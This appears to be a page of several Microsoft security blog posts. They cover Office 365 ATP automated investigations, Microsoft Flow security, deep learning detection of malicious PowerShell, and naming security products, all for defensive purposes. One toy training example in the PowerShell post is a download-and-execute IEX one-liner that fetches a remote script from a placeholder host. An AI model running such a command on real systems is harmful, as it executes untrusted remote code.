    • User-reported phishing emails—When a user reports what they believe to be a phishing email, an alert is raised triggering an automatic investigation.
    • User clicks a malicious link with changed verdict—An alert is raised when a user clicks a URL that is wrapped by Office 365 ATP Safe Links and is determined to be malicious through detonation (a change in verdict), or when the user clicks through the Office 365 ATP Safe Links warning pages. In both cases, the automated investigation kicks in as soon as the alert is raised.
    • Malware detected post-delivery (Malware Zero-Hour Auto Purge (ZAP))—When Office 365 ATP detects and/or ZAPs an email with malware, an alert triggers an automatic investigation.
    • Phish detected post-delivery (Phish ZAP)—When Office 365 ATP detects and/or ZAPs a phishing email previously delivered to a user’s mailbox, an alert triggers an automatic investigation.
  2. Manually triggered investigations that follow an automated playbook—Security teams can trigger automated investigations from within the Threat Explorer at any time for any email and related content (attachment or URLs).

Rich security playbooks

In each of the above cases, the automation follows rich security playbooks. These playbooks are essentially a series of carefully logged steps to comprehensively investigate an alert and offer a set of recommended actions for containment and mitigation. They correlate similar emails sent or received within the organization and any suspicious activities for relevant users. Flagged activities for users might include mail forwarding, mail delegation, Office 365 Data Loss Prevention (DLP) violations, or suspicious email sending patterns.

In addition, aligned with our Microsoft Threat Protection promise, these playbooks also integrate with signals and detections from Microsoft Cloud App Security and Microsoft Defender ATP. For instance, anomalies detected by Microsoft Cloud App Security are ingested as part of these playbooks. And the playbooks also trigger device investigations with Microsoft Defender ATP (for malware playbooks) where appropriate.

Let’s look at each of these automation scenarios in detail:

User reports a phishing email—This represents one of the most common flows investigated today. The alert is raised when a user reports a phishing email using the Report Message add-in in Outlook or Outlook on the web and triggers an automatic investigation using the User Reported Message playbook.

Screenshot of a phishing email being investigated.

User clicks on a malicious link—A very common attacker technique is to weaponize a link after delivery of an email. With Office 365 ATP Safe Links protection, we can detect such attacks when links are detonated at time-of-click. A user clicking such links and/or overriding the Safe Links warning pages is at risk of compromise. The alert raised when a malicious URL is clicked triggers an automatic investigation using the URL verdict change playbook to correlate any similar emails and any suspicious activities for the relevant users across Office 365.

Image of a clicked URL being assigned as malicious.

Email messages containing malware removed after delivery—One of the critical pillars of protection in Office 365 Exchange Online Protection (EOP) and Office 365 ATP is our capability to ZAP malicious emails. The “Email messages containing malware removed after delivery” alert triggers an investigation into similar emails and related user actions in Office 365 for the period when the emails were present in a user’s inbox. In addition, the playbook also triggers an investigation into the relevant devices for the users by leveraging the native integration with Microsoft Defender ATP.

Screenshot showing malware being zapped.

Email messages containing phish removed after delivery—With the rise in phishing attack vectors, Office 365 EOP and Office 365 ATP’s ability to ZAP malicious emails detected after delivery is a critical protection feature. The alert raised triggers an investigation into similar emails and related user actions in Office 365 for the period when the emails were present in a user’s inbox, and it also evaluates whether the user clicked any of the links.

Screenshot of a phish URL being zapped.

Automated investigation triggered from within the Threat Explorer—As part of existing hunting or security operations workflows, security teams can also trigger automated investigations on emails (and related URLs and attachments) from within the Threat Explorer. This provides Security Operations (SecOps) with a powerful mechanism to gain insights into any threats and related mitigations or containment recommendations from Office 365.

Screenshot of an action being taken in the Office 365 Security and Compliance dash. An email is being investigated.

Try out these capabilities

Based on feedback from our public preview of these automation capabilities, we extended the Office 365 ATP events and alerts available in the Office 365 Management API to include links to these automated investigations and related artifacts. This helps security teams integrate these automation capabilities into existing security workflow solutions, such as SIEMs.
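As a hedged sketch of what that integration can look like, the snippet below pulls audit content from the Office 365 Management Activity API so events can be forwarded to a SIEM. It assumes an existing subscription to the Audit.General content type and a valid Azure AD bearer token for https://manage.office.com; the tenant ID and token are placeholders.

    # Sketch: fetch Office 365 audit events (including ATP alerts) from the
    # Office 365 Management Activity API. Assumes an active "Audit.General"
    # subscription and a bearer token authorized for manage.office.com.
    import requests

    TENANT_ID = "<your-tenant-id>"   # placeholder
    token = "<bearer-token>"         # e.g., acquired via the client-credentials flow

    base = f"https://manage.office.com/api/v1.0/{TENANT_ID}/activity/feed"
    headers = {"Authorization": f"Bearer {token}"}

    # List available content blobs, then fetch the events inside each blob.
    blobs = requests.get(
        f"{base}/subscriptions/content",
        params={"contentType": "Audit.General"},
        headers=headers,
    ).json()

    for blob in blobs:
        for event in requests.get(blob["contentUri"], headers=headers).json():
            print(event.get("Operation"), event.get("CreationTime"))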

These capabilities are available as part of the following offerings. We hope you’ll give it a try.

Bringing SecOps efficiency by connecting the dots between disparate threat signals is a key promise of Microsoft Threat Protection. The integration across Microsoft Threat Protection helps bring broad and valuable insights that are critical to the incident response process. Get started with a Microsoft Threat Protection trial if you want to experience the comprehensive and integrated protection that Microsoft Threat Protection provides.

Automation services are steadily becoming significant drivers of modern IT, helping improve efficiency and cost effectiveness for organizations. A recent McKinsey survey discovered that “the majority of all respondents (57 percent) say their organizations are at least piloting the automation of processes in one or more business units or functions. Another 38 percent say their organizations have not begun to automate business processes, but nearly half of them say their organizations plan to do so within the next year.”

Automation is no longer a theme of the future, but a necessity of the present, playing a key role in a growing number of IT and user scenarios. As security professionals, you’ll need to recommend an automation service that enables your organization to reap its benefits without sacrificing on strict security and compliance standards.

In our two-part series, we share how Microsoft delivers on the promise of empowering a secure, compliant, and automated organization. In part 1, we provide a quick intro into Microsoft Flow and provide an overview into its best-in-class, secure infrastructure. In part 2, we go deeper into how Flow secures your users and data, as well as enhances the IT experience. We also cover Flow’s privacy and certifications to give you a glimpse into the rigorous compliance protocols the service supports. Let’s get started by introducing you to Flow.

To support the need for secure and compliant automation, Microsoft launched Flow. With Flow, organizations will experience:

  • Seamlessly integrated automation at scale.
  • Accelerated productivity.
  • Secure and compliant automation.

Secure and compliant automation is perhaps the most interesting value of Flow for this audience, but let’s discuss the first two benefits before diving into the third.

Integrated automation at scale

Flow is a Software as a Service (SaaS) automation service used by customers ranging from large enterprises, such as Virgin Atlantic, to smaller organizations, such as G&J Pepsi. Importantly, Flow serves as a foundational pillar for the Microsoft Power Platform, a seamlessly integrated, low-code development platform enabling easier and quicker application development. With Power Platform, organizations analyze data with Power BI, act on data through Microsoft PowerApps, and automate processes using Flow (Figure 1).

Diagram showing app automation driving business processes with Flow. The diagram shows Flow, PowerApps, and Power BI circling CDS, AI Builder, and Data Connectors.

Figure 1. Power Platform offers a seamless loop to deliver your business goals.

Low-code platforms can help scale IT capabilities by creating a broader range of application developers—from the citizen developer to the pro developer (Figure 2). With growing burdens on IT, scaling IT through citizen developers who design their own business applications is a tremendous advantage. Flow is also differentiated from other automation services by its native integration with Microsoft 365, Dynamics 365, and Azure.

Image showing Citizen Developers, IT/Admins, and Pro Developers.

Figure 2. Low-code development platforms empower everyone to become a developer, from the citizen developer to the pro developer.

Accelerated productivity

Flow accelerates your organization’s productivity. The productivity benefits from Flow were recently quantified in a Total Economic Impact (TEI) study conducted by Forrester Research and commissioned by Microsoft (The Total Economic Impact™ Of PowerApps And Microsoft Flow, June 2018). Forrester determined that over a three-year period Flow helped organizations reduce application development and application management costs while saving thousands of employee hours (Figure 3).

Image showing 70% for Application development costs, 38% for Application management costs, and +122K for Worker Hours Saved.

Figure 3. Forrester TEI study results on the reduced application development and management costs and total worker hours saved.

Built with security and compliance

Automation will be the backbone for efficiency across much of your IT environment, so choosing the right service can have enormous impact on delivering the best business outcomes. As a security professional, you must ultimately select the service which best balances the benefits from automation with the rigorous security and compliance requirements of your organization. Let’s now dive into how Flow is built on a foundation of security and compliance, so that selecting Flow as your automation service is an easy decision.

A secure infrastructure

Comprehensive security accounts for a wide variety of attack vectors, and since Flow is a SaaS offering, infrastructure security is an important component and where we’ll start. Flow is a global service deployed in datacenters across the world (Figure 4). Security begins with the physical datacenter, which includes perimeter fencing, video cameras, security personnel, secure entrances, and real-time communications networks—continuing from every area of the facility to each server unit. To learn more about how our datacenters are secured, take a virtual tour.

The physical security is complemented with threat management of our cloud ecosystem. Microsoft security teams leverage sophisticated data analytics and machine learning and continuously pen-test against distributed-denial-of-service (DDoS) attacks and other intrusions.

Flow also has the advantage of being the only automation service natively built on Azure, whose architecture is designed to secure and protect data. Each datacenter deployment of Flow consists of two clusters:

  • Web Front End (WFE) cluster—A user connects to the WFE before accessing any information in Flow. Servers in the WFE cluster authenticate users with Azure Active Directory (Azure AD), which stores user identities and authorizes access to data. Azure Traffic Manager finds the nearest Flow deployment, and that WFE cluster manages sign-in and authentication.
  • Backend cluster—All subsequent activity and access to data is handled through the back-end cluster. It manages dashboards, visualizations, datasets, reports, data storage, data connections, and data refresh activities. The backend cluster hosts many roles, including Azure API Management, Gateway, Presentation, Data, Background Job Processing, and Data Movement.

Users directly interact only with the Gateway role and Azure API Management, which are accessible through the internet. These roles perform authentication, authorization, DDoS protection, bandwidth throttling, load balancing, routing, and other security, performance, and availability functions. There is a distinction between roles users can access and roles only accessible by the system.

Stay tuned for part 2 of our series where we’ll go deeper into how Flow further secures authentication of your users and data, and enhances the IT experience, all while aligning to several regulatory frameworks.

Image showing Microsoft’s global datacenter locations.

Figure 4. Microsoft’s global datacenter locations.

Let Flow enhance your digital transformation

Let your organization start benefiting from one of the most powerful and secure automation services available on the market. Watch the video and follow the instructions to get started with Flow. Be sure to join the growing Flow community and participate in discussions, provide insights, and even influence product roadmap. Also, follow the Flow blog to get news on the latest Flow updates and read our white paper on best practices for deploying Flow in your organization. Be sure to check out part 2 where we dive deeper into how Flow offers the best and broadest security and compliance foundation for any automation service available in the market.

Scientific and technological advancements in deep learning, a category of algorithms within the larger framework of machine learning, provide new opportunities for the development of state-of-the-art protection technologies. Deep learning methods are impressively outperforming traditional methods on tasks such as image and text classification. With these developments, there’s great potential for building novel threat detection methods using deep learning.

Machine learning algorithms work with numbers, so objects like images, documents, or emails are converted into numerical form through a step called feature engineering, which, in traditional machine learning methods, requires a significant amount of human effort. With deep learning, algorithms can operate on relatively raw data and extract features without human intervention.

At Microsoft, we make significant investments in pioneering machine learning that informs our security solutions with actionable knowledge through data, helping deliver intelligent, accurate, and real-time protection against a wide range of threats. In this blog, we present an example of a deep learning technique that was initially developed for natural language processing (NLP) and is now adapted and applied to expand our coverage of malicious PowerShell scripts, which continue to be a critical attack vector. These deep learning-based detections add to the industry-leading endpoint detection and response capabilities in Microsoft Defender Advanced Threat Protection (Microsoft Defender ATP).

Word embedding in natural language processing

Keeping in mind that our goal is to classify PowerShell scripts, we briefly look at how text classification is approached in the domain of natural language processing. An important step is to convert words to vectors (tuples of numbers) that can be consumed by machine learning algorithms. A basic approach, known as one-hot encoding, first assigns a unique integer to each word in the vocabulary, then represents each word as a vector of 0s, with 1 at the integer index corresponding to that word. Although useful in many cases, one-hot encoding has significant flaws. A major issue is that all words are equidistant from each other, so semantic relations between words are not reflected in geometric relations between the corresponding vectors.
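
To make that flaw concrete, here is a minimal sketch of our own (a toy three-word vocabulary, not from the original research) showing that every pair of distinct one-hot vectors sits at exactly the same distance:

```python
import numpy as np

# Toy vocabulary: each word gets a unique integer index.
vocab = {"cat": 0, "dog": 1, "car": 2}

def one_hot(word: str) -> np.ndarray:
    vec = np.zeros(len(vocab))
    vec[vocab[word]] = 1.0
    return vec

# All distinct word pairs are sqrt(2) apart, so the geometry
# encodes no semantic information at all:
print(np.linalg.norm(one_hot("cat") - one_hot("dog")))  # 1.414...
print(np.linalg.norm(one_hot("cat") - one_hot("car")))  # 1.414...
```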

Contextual embedding is a more recent approach that overcomes these limitations by learning compact representations of words from data under the assumption that words that frequently appear in similar context tend to bear similar meaning. The embedding is trained on large textual datasets like Wikipedia. The Word2vec algorithm, an implementation of this technique, is famous not only for translating semantic similarity of words to geometric similarity of vectors, but also for preserving polarity relations between words. For example, in Word2vec representation:

Madrid – Spain + Italy ≈ Rome
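
This classic analogy can be reproduced with, for example, the gensim library and its publicly hosted pretrained Google News vectors (a sketch under those assumptions; note the download is large, roughly 1.6 GB):

```python
import gensim.downloader as api

# Pretrained Word2vec vectors trained on Google News,
# fetched from the gensim-data repository.
wv = api.load("word2vec-google-news-300")

# Madrid - Spain + Italy lands near Rome in vector space.
print(wv.most_similar(positive=["Madrid", "Italy"], negative=["Spain"], topn=3))
```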

Embedding of PowerShell scripts

Since training a good embedding requires a significant amount of data, we used a large and diverse corpus of 386K distinct unlabeled PowerShell scripts. The Word2vec algorithm, which is typically used with human languages, provides similarly meaningful results when applied to the PowerShell language. To accomplish this, we split the PowerShell scripts into tokens, which then allowed us to use the Word2vec algorithm to assign a vectorial representation to each token.
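
Roughly, the pipeline looks like the sketch below. This is our own simplified illustration: the tokenizer is a crude stand-in (real PowerShell tokenization is more involved), and the two inline scripts merely stand in for the 386K-script corpus:

```python
import re
from gensim.models import Word2Vec

def tokenize(script: str) -> list[str]:
    # Crude placeholder tokenizer: lowercase, then keep runs of
    # characters common in PowerShell tokens ($, -, letters, digits).
    return re.findall(r"[\w$-]+", script.lower())

# `scripts` would be the full unlabeled corpus; two toy examples here.
scripts = [
    "IEX (New-Object Net.WebClient).DownloadString('http://example/x.ps1')",
    "Get-ChildItem -Path C:\\ -Recurse | Where-Object { $_.Length -gt 1MB }",
]

model = Word2Vec(
    sentences=[tokenize(s) for s in scripts],
    vector_size=100,  # dimensionality of each token's vector
    window=5,         # context window around each token
    min_count=1,      # keep every token in this toy corpus
)
vec = model.wv["-gt"]  # vectorial representation of one token
```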

Figure 1 shows a 2-dimensional visualization of the vector representations of 5,000 randomly selected tokens, with some tokens of interest highlighted. Note how semantically similar tokens are placed near each other. For example, the vectors representing -eq, -ne and -gt, which in PowerShell are aliases for “equal”, “not-equal” and “greater-than”, respectively, are clustered together. Similarly, the vectors representing the allSigned, remoteSigned, bypass, and unrestricted tokens, all of which are valid values for the execution policy setting in PowerShell, are clustered together.

Figure 1. 2D visualization of 5,000 tokens using Word2vec

Examining the vector representations of the tokens, we found a few additional interesting relationships.

Token similarity: Using the Word2vec representation of tokens, we can identify commands in PowerShell that have an alias. In many cases, the token closest to a given command is its alias. For example, the representations of the token Invoke-Expression and its alias IEX are closest to each other. Two additional examples of this phenomenon are the Invoke-WebRequest command and its alias IWR, and the Get-ChildItem command and its alias GCI.
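
With a model trained as sketched earlier (and a corpus large enough to contain both the commands and their aliases; the toy corpus above is far too small), the nearest-neighbor lookup is a one-liner per command:

```python
# Hypothetical check, assuming `model` was trained on the full corpus
# with the lowercasing tokenizer sketched above.
for command in ["invoke-expression", "invoke-webrequest", "get-childitem"]:
    # The nearest neighbor is often the command's alias
    # (iex, iwr, and gci, respectively).
    print(command, "->", model.wv.most_similar(command, topn=1))
```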

We also measured distances within sets of several tokens. Consider, for example, the four tokens $i, $j, $k, and $true (see the right side of Figure 2). The first three are usually used to represent a numeric variable, and the last naturally represents a Boolean constant. As expected, the $true token was the odd one out: it was the farthest (using the Euclidean distance) from the center of mass of the group.

More specific to the semantics of PowerShell in cybersecurity, we checked the representations of the tokens bypass, normal, minimized, maximized, and hidden (see the left side of Figure 2). While the first token is a legal value for the ExecutionPolicy flag in PowerShell, the rest are legal values for the WindowStyle flag. As expected, the vector representation of bypass was the farthest from the center of mass of the vectors representing the other four tokens.
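
Both experiments boil down to the same computation: stack the token vectors, take their mean, and find the vector farthest from that centroid. A minimal sketch, assuming `model.wv` from the earlier training sketch:

```python
import numpy as np

def farthest_from_center(tokens: list[str], wv) -> str:
    """Return the token farthest (Euclidean) from the group's centroid."""
    vectors = np.stack([wv[t] for t in tokens])
    center = vectors.mean(axis=0)
    distances = np.linalg.norm(vectors - center, axis=1)
    return tokens[int(distances.argmax())]

# Expected outliers per the experiments described above:
# farthest_from_center(["$i", "$j", "$k", "$true"], model.wv)  -> "$true"
# farthest_from_center(["bypass", "normal", "minimized",
#                       "maximized", "hidden"], model.wv)      -> "bypass"
```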

Figure 2. 3D visualization of selected tokens

Linear relationships: Since Word2vec preserves linear relationships, computing linear combinations of the vectorial representations yields semantically meaningful results. Below are a few interesting relationships we found:

high – $false + $true ≈ low
-eq – $false + $true ≈ -ne
DownloadFile – $destfile + $str ≈ DownloadString
Export-CSV – $csv + $html ≈ ConvertTo-Html
Get-Process – $processes + $services ≈ Get-Service

In each of the above expressions, the sign ≈ signifies that the vector on the right side is the closest (among all the vectors representing tokens in the vocabulary) to the vector that results from the computation on the left side.

Detection of malicious PowerShell scripts with deep learning

We used the Word2vec embedding of the PowerShell language presented in the previous section to train deep learning models capable of detecting malicious PowerShell scripts. The classification model is trained and validated using a large dataset of PowerShell scripts that are labeled “clean” or “malicious,” while the embeddings are trained on unlabeled data. The flow is presented in Figure 3.

Figure 3. High-level overview of our model generation process

Using GPU computing in Microsoft Azure, we experimented with a variety of deep learning and traditional ML models. The best performing deep learning model increases coverage (at a fixed low false positive rate of 0.1%) by 22 percentage points compared to traditional ML models. This model, presented in Figure 4, combines several deep learning building blocks, such as Convolutional Neural Networks (CNNs) and Long Short-Term Memory Recurrent Neural Networks (LSTM-RNNs). Neural networks are ML algorithms inspired by biological neural systems like the human brain. In addition to the pretrained token embedding described here, the model is provided with a character-level embedding of the script.
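
The exact architecture isn’t spelled out here beyond its building blocks, but a minimal sketch of how those blocks compose (pretrained token embedding feeding a CNN, then an LSTM, then a classification head; the character-level branch omitted) might look like this in PyTorch:

```python
import torch
import torch.nn as nn

class PowerShellClassifier(nn.Module):
    """Minimal sketch of the building blocks named above; the real model
    in Figure 4 is more elaborate (e.g., it adds a character-level branch)."""

    def __init__(self, pretrained: torch.Tensor):
        super().__init__()
        # Token embedding initialized from the pretrained Word2vec vectors.
        self.embed = nn.Embedding.from_pretrained(pretrained, freeze=False)
        self.conv = nn.Conv1d(pretrained.size(1), 128, kernel_size=3, padding=1)
        self.lstm = nn.LSTM(input_size=128, hidden_size=64, batch_first=True)
        self.head = nn.Linear(64, 1)

    def forward(self, token_ids: torch.Tensor) -> torch.Tensor:
        x = self.embed(token_ids)            # (batch, seq, emb)
        x = self.conv(x.transpose(1, 2))     # Conv1d expects (batch, emb, seq)
        x, _ = self.lstm(x.transpose(1, 2))  # back to (batch, seq, channels)
        return torch.sigmoid(self.head(x[:, -1]))  # malicious score in [0, 1]
```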

Figure 4. Network architecture of the best performing model

Real-world application of deep learning to detecting malicious PowerShell

The best performing deep learning model is applied at scale, using Microsoft ML.NET technology and the ONNX format for deep neural networks, to the PowerShell scripts observed by Microsoft Defender ATP through the Antimalware Scan Interface (AMSI). This model augments the suite of ML models and heuristics used by Microsoft Defender ATP to protect against malicious usage of scripting languages.
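
As a rough sketch of what that hand-off can look like (using the hypothetical model class above; the file and tensor names are illustrative), a trained PyTorch model is exported to ONNX, which a .NET service can then load for scoring:

```python
import torch

# Export the sketch model above to ONNX so a .NET service can score it
# (ML.NET consumes ONNX models via its OnnxTransformer components).
model = PowerShellClassifier(pretrained=torch.randn(10_000, 100))
model.eval()
dummy = torch.randint(0, 10_000, (1, 256))  # one script of 256 token ids
torch.onnx.export(
    model, dummy, "powershell_classifier.onnx",
    input_names=["token_ids"], output_names=["malicious_score"],
    dynamic_axes={"token_ids": {0: "batch", 1: "sequence"}},
)
```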

Since its first deployment, this deep learning model has detected with high precision many cases of malicious and red team PowerShell activity, some undiscovered by other methods. The signal obtained through PowerShell is combined with a wide range of other ML models and signals in Microsoft Defender ATP to detect cyberattacks.

The following are examples of malicious PowerShell scripts that deep learning detects with confidence but that are challenging for other detection methods:

Figure 5. Heavily obfuscated malicious script

Figure 6. Obfuscated script that downloads and runs payload

Figure 7. Script that decrypts and executes malicious code

Enhancing Microsoft Defender ATP with deep learning

Deep learning methods significantly improve the detection of threats. In this blog, we discussed a concrete application of deep learning to a particularly evasive class of threats: malicious PowerShell scripts. We have developed, and will continue to develop, deep learning-based protections across multiple capabilities in Microsoft Defender ATP.

Development and productization of deep learning systems for cyber defense require large volumes of data, computations, resources, and engineering effort. Microsoft Defender ATP combines data collected from millions of endpoints with Microsoft computational resources and algorithms to provide industry-leading protection against attacks.

Stronger detection of malicious PowerShell scripts and other threats on endpoints using deep learning means richer and better-informed security through Microsoft Threat Protection, which provides comprehensive security for identities, endpoints, email and data, apps, and infrastructure.

 

Shay Kels and Amir Rubin
Microsoft Defender ATP team

 



Talk to us

Questions, concerns, or insights on this story? Join discussions at the Microsoft Defender ATP community.

Read all Microsoft security intelligence blog posts.

Follow us on Twitter @MsftSecIntel.

When I was a kid, Gilligan’s Island reruns aired endlessly on TV. The character of the Professor was supposed to sound smart, so he’d use complex words to describe simple concepts. Instead of saying, “I’m nearsighted” he’d say, “My eyes are ametropic and completely refractable.” Sure, it was funny, but it didn’t help people understand his meaning.

Security vendors and professionals suffer from a pinch of “Professor-ism” and often use complex words and terminology to describe simple concepts. Here are a few guidelines to consider when naming or describing your products, services, and features:

Assess whether a new term or acronym is needed

Before trying to create a new term or acronym, assess whether an existing one will work. Consider the mobile device space, where the tools used to manage mobile devices were originally known as MDM, for mobile device management. Pretty straightforward. But then the acronym flood started with MAM (mobile application management), MIM (mobile information management), and EMM (enterprise mobility management). It’s true, there are some technical differences between the four, but a quick Bing search shows a raft of articles explaining the differences because the distinctions aren’t clear to the average customer. And, frankly, all of them are basically subsets of MDM.

Use acronyms with enthusiasm and clarity

When creating a new term or acronym, there is no point in being memorable if the meaning gets lost in the noise. Instead of succumbing to the path of least resistance by forming an acronym, put a little oomph into your naming efforts.

A recent example is SOAR (Security Orchestration, Automation, and Response). Yes, it was a whole new category, and one adjacent to SIEM (security information and event management), but it adds clarity because it describes a new set of features and functions—like incident response activities and playbooks—which aren’t covered by traditional SIEMs.

Acronyms can save time, but when you get into splintered variants like the MDM example, clarity goes out the window. Since not all acronyms are created equal, go for acronym gold—and make sure there is a recognizable connection to your brand or (even better) the product itself.

This strategy can yield explosive results! Think TNT (Trinitrotoluene), or the more chill TCBY® (The Country’s Best Yogurt), or the zip in ZIP code (Zone Improvement Plan). Compare these zingers with an acronym for something like UDM (Unified Data Management). Sorry—is that the sound of you snoring? (Me, too!)

Put a little pep in your step (and your sales) by producing names that are sharply focused—like laser (Light Amplification by Stimulated Emission of Radiation), an acronym that has become synonymous with what it does and has some well-placed vowels. Another winner in this category is GIF (graphics interchange format). While this acronym wasn’t recognizable out of the gate, it became synonymous with the format it names by adding a bit of pizzazz to the mix.

Use names that are clear and practical—but catch and hold the imagination

Resist the temptation to take a cool buzzword and tack it onto your marketing efforts to take advantage of the attention. I once saw a basic power strip advertised as “internet ready.” Come on now! Find words or phrases that catch and hold the imagination—while saying something about your product’s functionality.

Sometimes it’s as simple as helping customers understand what the product does: antimalware? Customers are going to get that this probably protects against malware. If the solution really is a new approach, make the name as clear as possible.

In addition, rather than inventing new terms, consider being very practical. Think of the use-cases and ask these questions: What does the solution do for the customer or business? What does the solution deliver? Or what kind of brand experience does your product provide?

Years ago, I ran afoul of a company that advertised itself as “S-OX in a Box” (that’s Sarbanes-Oxley, not a sports or footwear reference) because I wrote a piece on the complexity of the tech side of S-OX compliance. I explained why it wasn’t as simple as buying a “S-OX in a Box” solution. I wasn’t trying to call out that specific company, but rather to show why it can be better to be clear and explicit about what a solution does. S-OX is too complex for a single solution to do it all. But a tool that can help automate S-OX compliance reporting? That, for many companies, is a big win.

Also, think about the non-cyber world—where companies describe the function to discover an evocative name. Examples of everyday products that accomplish this include bubble wrap, Chapstick®, Crock-Pot®, and Onesie®. Not all first tries will be winners. For example, the breathalyzer was originally known as the Drunk-O-Meter. Just experiment with it. Have some fun. Make it meaningful to your client or customer.

Never overpromise

Promising customers that they will never have a breach again is a pretty lofty claim, and most likely an impossible one. Words like absolute, perfect, and unhackable may sound good in copy, but can you guarantee that a product or solution will really deliver absolute security?

Savvy customers know that security is about risk management and tradeoffs and that no solution is completely immune to all attacks. Rather than overpromise, consider helping the customer understand what the solution does. Does the product protect against a breach by monitoring the database? Good, then say that.

Get creative and mix it up

Get creative by mixing initials and non-initial letters, as in “radar” (RAdio Detection And Ranging). Or try an “initialism,” which requires you to pronounce the abbreviation as a string of separate letters; examples include OEM (original equipment manufacturer) and the BBC (British Broadcasting Corporation). You can also incorporate a shortcut into the name by combining numbers and letters, as in 3M (Minnesota Mining and Manufacturing Company).

If you’re really stuck, try a backronym

A backronym is created when you turn a word into an acronym by assigning each letter a word of its own—after a term is already in use. For example, the term “rap” (as in rap music) is a backronym for rhythm and poetry and SOAR is a backronym for Security Orchestration, Automation, and Response.

If you want something closer to the technology realm, check out what NASA (a well-known acronym for National Aeronautics and Space Administration) did. They named a space station treadmill in honor of comedian Stephen Colbert by coming up with the words to spell out his name: Combined Operational Load-Bearing External Resistance Treadmill (COLBERT).

Find your sweet spot

When it comes to using common words to describe uncommon things, combine the freshness and friendliness of Mary Ann with the profit mindset of Thurston Howell III. Aim for names that intrigue people with their relatability and nail the sale by giving clients and customers a clear idea of the product’s business value.

Reach out to me on LinkedIn or Twitter and let me know what you’d like to see us cover as we talk about new security products and capabilities.